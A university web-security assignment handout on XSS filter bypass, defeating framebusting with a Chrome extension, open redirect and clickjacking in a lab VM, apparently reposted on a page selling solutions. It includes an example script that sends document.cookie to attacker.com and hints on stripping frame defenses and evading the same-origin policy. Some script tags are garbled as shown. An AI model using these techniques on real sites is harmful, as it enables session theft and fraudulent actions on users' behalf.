$30
CS6262 Project 2 Solved
All work needs to be done inside the VM.
1. Part 1
a. Understand well known vulnerabilities such as cross-site scripting (XSS) and bypass regex detectors with your own XSS.
b. Understand and implement framebusting using the same extension to prevent malicious web page forgery and framing via iframes.
2. Part 2 (50 Points)
a. Exploit a vulnerable website utilizing Open Redirect. (10 Points)
b. Exploit a vulnerable website called GTShop by utilizing clickjacking. (40 Points)
Due Date
Please refer to the Canvas assignment. The autograder for Part 1 will close 1 week before Part 2, to ensure you have enough time to complete Part 2, so start early if you want to leverage the autograder!
Useful Suggestions
Special thanks to Joves Luo for compiling this list of helpful tips. You should refer to them as you proceed through the project.
General
• Use the console or developer tools to view Javascript errors.
• Use console.log(“message”) or alert(“message”) to debug.
• Most errors you encounter are likely very common and specific error messages are most likely solved via Googling.
• View web page’s source code. Pay attention to hidden inputs. “Security by obscurity is a hacker’s best friend.”
Part 1.1: XSS
• There are 3 regex patterns that you have to bypass. You will have to come up with 3 different whole script XSS attacks.
• HTML has some very interesting syntax rules so you should refresh yourselves on what constitutes valid HTML.
• The following link may be useful in crafting your attacks.
https://www.w3schools.com/Tags/tag_script.asp
• Remember: you can make your attacks as crazy looking as you want them to be. As long as your attacks are composed of valid html and script, you can pass the regex and get the points.
• Try to make a small change first. An extra character in certain places can completely bypass some regex detectors.
This part is foreshadowing other parts of the project. You learn how to bypass XSS. What is XSS and Why is it blocked? What can it do if left unchecked? Keep these in mind.
Part 1.2: Framebusting
• Script inside the frame contains DEFENSIVE code. It prevents index.html from holding the iframe. Your job is to prevent the script from running.
• You may find a way to run code before the script in the iframe runs, then block, replace or remove it in some way.
• Content Scripts allow you to run your javascript inside a website you are visiting via an Extension.
It has some caveats but it is a possible approach to the problem.
• Background scripts running in background enable you to INTERCEPT and MODIFY http requests. It also has some caveats but it is a feasible solution to the problem. • This paper provides you useful information on framebusting
Part 2.1: Open Redirect
• This is NOT a coding exercise. You compose a URL that redirects a user to the GT admission page when s/he logs in.
• You can learn rudiments of URL in this lin k.
• Write a URL that results in the redirect. Copy and paste it into redirect.txt. No code required.
Part 2.2: Clickjacking
1. Get an iframe to run code it shouldn't. Think back to the part 1, how did we get a victim to run unintended code? For the web, what vulnerability makes this happen? Remind your experience from CS6035, Intro to Information Security.
2. Get information about the iframe. How can we get data from another domain? Review related lectures.
3. How do we pass data back and forth? Take what you figured out in step 2, mirror it to get two way communication.
4. With the data, what does the parent window need to do with the info?
5. The buy action is subject to SOP. How do you get around it?
6. Once you figure out how to get around the SOP, what needs to be executed to buy something?
a. When you buy something, you need a correct ID only. Don’t worry about product names, addresses, mails, etc.
b. If you get a success response but nothing is actually purchased, that is because the server code swallows exceptions.
c. You need only one iframe.
d. You don’t need to bother with the tester leaving the search results page.
e. Each query will be with a fresh search from your page.
You will submit 5 files to Canvas for grading:
For the part 1 tasks, you can only zip these 3 files and upload to gradescope for testing your solution.
But please submit all the 5 files to Canvas before the whole project dues.
Part 1
• manifest.json
• xss_attacks.txt
• frame_buster.js
Part 2
• redirect.txt
• clickjack.html
Project Setup
Virtual Machine (CS6262 P2 Spring 2021.ova)
All tasks need to be done inside the VM.
Download a VM via the following link:
• Mirror #1: Link to OVA on Google Drive
• Mirror #2: Link to OVA on OneDrive
md5: 85d82922198afa2c03255dcda634774b
Import the OVA file into the latest version of VirtualBox. The VM may take a while to boot.
The credentials are:
• Username: user
• Password: user
If you find the VM booting quite slowly, please do the following check after it first boots up. Run “sudo blkid” and copy the UUID of the line which contains TYPE=”swap”.
Then, run “sudo vim /etc/fstab” and update the entry of UUID of the “swap” line.
After updating it, input “:wq” to save and exit. Now you can reboot the VM. It should boot much faster.
We do NOT recommend you to update any existing packages via package managers (e.g., apt-get) or the update dialog shown below:
In the case where you accidentally update packages and experience any malfunction, you may want to repeat the VM install with a fresh copy. Although there is no restriction for you to install any necessary packages (e.g., your favorite editors), you should do that at your own risk.
Part 1 XSS and Framebuster files (part1.zip)
Download and unzip Part 1 skeleton files:
• Mirror #1: https://drive.google.com/open?id=1L7KqG3Yr2N9Q159zgVL6VgVAQEWQ5x7 s
• Mirror #2: https://drive.google.com/file/d/121Re9RL4XTbNZ5lT-F3skL7qn_i-0kO U md5: 815ad2933f951c13516caabb3ec0315b
Your part 1 should have the following files:
Your demo-color-changer-chrome-extension folder should have:
Part 2 Open Redirect and Clickjacking Files (part2.zip)
Download and unzip Part 2 skeleton files:
• Mirror #1: https://drive.google.com/file/d/1EiLjDcSVN2TQe2R97zcx-QK2bxEvoD_O
• Mirror #2: https://drive.google.com/file/d/1cSocsrSyyJH3bYGUnpw82Yr6KuGDqask/
md5: ae9f8b51b9806359fae14cd8c73259a4
Project Tasks (100 points):
Part 1: XSS and Framebusting ( 50 points)
Part 1.1: XSS Attack - (30 points)
Overview
This part aims to help you understand how you can spoof regex detectors with a maliciously crafted text string. Although it may seem to be a tempting solution, detecting XSS attacks with regex is a bad idea in reality. We want you to experience this by conducting XSS attacks with your own scripts and bypassing the vulnerable XSS defender. To this end, we have set up a server which is accessible inside the VM ONLY:
http://cs6262.gtisc.gatech.edu/
By copying this URL into the browser inside the VM, you are able to see two links for the two tasks in Part 1.
The XSS link will bring you to a website containing 3 input fields. Each input will be examined by three different regex patterns. Your job is to compose 3 different XSS attacks which are able to bypass those 3 regex patterns. Be careful that your attacks should be EXECUTABLE html code in web browsers. You can copy your code into the HTML panel on https://jsfiddle.net / and run it to see if it can execute.
IMPORTANT:
1. YOUR CODE MUST BE EXECUTABLE FOR FULL CREDIT. IF YOUR CODE PASSES
OUR REGEX FILTER BUT DOES NOT EXECUTE, YOU WILL NOT RECEIVE FULL
CREDIT. (You will receive partial credit if your XSS passes the filter but DOES NOT execute. However, you won’t receive any credit in the other case (i.e., executable but failed to pass the filter)
2. FOR GRADING PURPOSES, YOU MUST INSERT ALERT IN YOUR XSS ATTACK PAYLOAD.
Alert is a built-in javascript function for a pop-up message. You can use it as follows:
<scriptalert("wazzzzaaaup");</script
You are responsible for ensuring your XSS attacks are valid HTML so that the alert should be properly interpreted and run by the web browser. Getting the SUCCESS response means your XSS attack bypassed our regex filter, but it does NOT necessarily imply that your script is executable. Again, ensure you place your XSS attack in an HTML page (or jsfiddle) and run it, to ensure an alert is generated (meaning it executes).
On a successful attack, the web page would return results like the following. Each image shows the success and fail results respectively.
Resources
Tutorial Document
The following document gives you an in-depth introduction to XSS. https://docs.google.com/document/d/1F7_axXzKVdqegWQDX6HmlwNchhsaLchWieOagWVzgh E
Additional Resources
You can learn the foundations of XSS and RegEx in following links:
About XSS:
https://en.wikipedia.org/wiki/Cross-site_scripting https://gbhackers.com/xss-cross-site-scripting/
About REGEX:
https://en.wikipedia.org/wiki/Regular_expression https://www.computerhope.com/jargon/r/regex.htm The sample_xss_attacks.txt shows some XSS samples.
Whole Script XSS
A whole script attack consists of opening and closing script tags that embeds JavaScript statements in-between. Attackers inject the malicious code into the victim's page in order to exfiltrate the sandbox (e.g., Same Origin Policy) of web browsers. For example,
<script
document.location= "http://attacker.com/saveCookie.php?cookie=" + document .cookie; </script
For more details, please read this paper:
Protection, Usability and Improvements in Reflected XSS Filters
Part 1.2: Browser Extension Framebuster - (20 points)
Background: Frame Busting
An iframe is a HTML tag that embeds another HTML document in the current web page. The origin of the embedding HTML document could be different to the one of the host webpage that a user is visiting.
Frame-busting is a technique that protects clients from clickjacking. It prevents web pages from being rendered inside a frame.
One method to block client-side clickjacking is to place the following JavaScript snippet in each web page:
<script
if (top != self) top.location.href = location.href; </script
Overview
You will create a Google Chrome Extension to:
• Bypass the frame busting technique used in the sample website
Sample Website with Frame Buster
http://cs6262.gtisc.gatech.edu/framebusting/
You can only access this site inside the VM.
• Under the frame directory, there are two pages:
• frame-busting-page.html
• index.html
• Your extension (which contains frame_buster.js ) should bypass the frame busting technique and frame the frame-busting-page.html page into the index.html’s (under frame directory) iframe.
Example of Successful Frame Buster Buster
Resources
Quick Start
You can find the Chrome extension quickstart guide in Canvas - Files - Guides and Tutorials. This will be helpful if you don’t have experience with Chrome Extensions.
Chrome Extension
If you are unfamiliar with browser extension development, check out a demo extension in the demo-color-changer-chrome-extension folder.
The most important component of a Chrome browser extension is the manifest.json file. It looks like:
{
"name": "CS6262 Extension",
"description": "A simple extension",
"version": "1.0",
"permissions": [
"tabs",
"notifications"
],
"background": {
"scripts": ["frame_buster.js"],
"persistent": false
},
"browser_action": {
"default_title": "Does something",
"default_icon": "icon.png"
},
"manifest_version": 2
}
The JSON file shows various keys like browser_action , permissions , and background . You use them to complete this part of the project. For further information about the typical Chrome extension structure, refer to this link:
https://developer.chrome.com/extensions/getstarted
Note: The manifest.json file should only reference your frame_buster.js file. If you leave references to other files like icon.png, your manifest.json will error out and you will not receive points.
For further reading, refer to https://developer.chrome.com/extensions/webReques t
Part 1 Grading
Part 1.1 XSS Requirements
• You may not use the same XSS attack on multiple inputs. Each attack must be unique! Each pair of similar attacks will result in a 2-point penalty.
• Hard coded ‘Success’ is prohibited and will result in a 0.
• Your three answers should be placed on three separate lines in xss_attacks.txt
• No external libraries are allowed.
• Code must be executable.
Part 1.2 Frame Busting Requirements
• Do not use the “sandboxing attribute” of the browser to bypass the frame buster. Doing so will result in zero credit.
• Your extension must not pop up any kind of alerts which requires user interaction.
• You may use automatic notifications but no JavaScript alerts.
• Pop-ups that require user interaction will result in zero credit.
• Please make sure the page can be loaded within 3 seconds, otherwise it will result in zero credit.
• Do NOT hardcode any URLs in your source code. Your extension should work for ANY website if the same vulnerability is present. Otherwise, a 10 point penalty will be applied to your project grade.
• Your extension must work for the original Google Chrome in the given VM. We will not grade your extension outside the VM nor with other versions of Google Chrome in any different environment.
• Your extension must not modify the appearance of the framed page. It should look exactly the same, pixel-by-pixel . Otherwise, a 10 point penalty will be applied to your project grade.
• Remove all references to files other than frame_buster.js from your manifest.json. You should not reference any other file like icon.png etc. Referencing files other than frame_buster.js may result in a 0 for this portion.
• No external libraries are allowed.
Deliverables
• manifest.json
• xss_attacks.txt
• frame_buster.js
Autograder
GradeScope has an autograder setup to test your submissions. For the XSS task, it has the same XSS filters as what are used by the XSS website. For the framebusting task, it primarily tests the functionality of your extension which is to prevent the page from going to frame-busting-page.html.
